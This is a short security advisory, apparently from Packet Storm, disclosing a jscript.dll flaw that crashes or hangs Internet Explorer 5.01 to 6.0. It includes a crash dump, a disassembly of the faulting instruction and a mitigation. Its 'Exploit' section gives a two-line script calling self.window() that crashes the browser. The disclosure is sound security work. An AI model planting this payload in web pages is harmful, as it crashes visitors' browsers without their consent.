Microsoft's Windows Script Engine within the Windows operating system has a flaw in its implementation of jscript.dll. When a malicious web page is loaded with code that points to self.window() random errors and lock ups occur in Internet Explorer. Tested against IE versions: 5.01 (Win2000), 5.5(Win98SE), 6.0(WinXP). Vulnerable jscript.dll versions: 5.1.0.8513 (Win2000), 5.5.0.8513 (Win98SE), 5.6.0.6626 (WinXP Pro), 5.6.0.8513 (Win2000).
47ac1d606f466452571ac90777b13a37b24d69838cf1609016f6c7dfe9905845hi,
i found a bug in jscript.dll... here is a small report on it...
--------
Abstract
--------
Microsoft Corp.'s Windows Script Engine within the Windows operating
system (OS) interprets and executes script code written in scripting
languages such as VBscript and JScript. Such script code can be used to
add functionality to web pages, or to automate tasks within the OS or a
program. Script code can be written in several different scripting
languages, such as Visual Basic Script, JScript or JavaScript.
-----------
Description
-----------
By passing malicious JavaScript via Internet Explorer (IE), Outlook or
Outlook Express, remote attackers can crash Internet Explorer..
The bug lies in the Windows Script Engine's implementation of
JScript that is provided by jscript.dll (located in %SystemRoot%\system32).
The following snippet of JavaScript code demonstrates the existence of the
bug by crashing IE on a vulnerable Windows system:
----------
Exploit
----------
<script>
this.window();
</script>
or....
<script>
self.window();
</script>
---------
Notes
---------
IE crashes in Win2k... with the following error
----------------------------------------------------
The instruction at "0x6b73aa15" referenced memory at "0x006f0063".
The memory could not be "read".
----------------------------------------------------
Disassembly... of JScript.dll[5.6.08513]...
6B73AA0A je 6B73AA25
6B73AA0C mov eax,dword ptr [ebp-64h]
6B73AA0F mov eax,dword ptr [eax+8]
6B73AA12 mov ecx,dword ptr [eax]
6B73AA14 push eax
6B73AA15 call dword ptr [ecx+8] <--- illegal op
6B73AA18 mov edx,dword ptr [ebp-4Ch]
6B73AA1B push edx
6B73AA1C call dword ptr ds:[6B773218h]
6B73AA22 add esp,4
6B73AA25 mov eax,dword ptr [ebp-34h]
6B73AA28 jmp 6B7213CB
6B73AA2D mov esi,dword ptr [ebp+18h]
we find that the value in ecx [ie. value at memory location
pointed by eax is corrupted...].
Please Note:
a few times the IE didn't cause an exception, instead it went sort of a hung state..
the home/stop button or and any new url typed in the url box didn't work..
---------------------------
Possible Solution
---------------------------
Disable Active Scripting
---------------
Tested On
---------------
IE 5.01 (Win2000)
IE 5.5 (Win98SE)
IE 6.0 (WinXP)
ie.
JSCript.dll versions
5.1.0.8513 (Win2000)
5.5.0.8513 (Win98SE)
5.6.0.6626 (WinXP Pro)
5.6.0.8513 (WIn2000)
----------
Credits
----------
Real Name : Gregory R. Panakkal
Handle : junkcode
E-Mail : junkcode@gmx.net
WWW : www.evilcreations.net/junkcode/ (OR) www.crapware.tk
rgds,
junkcode
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed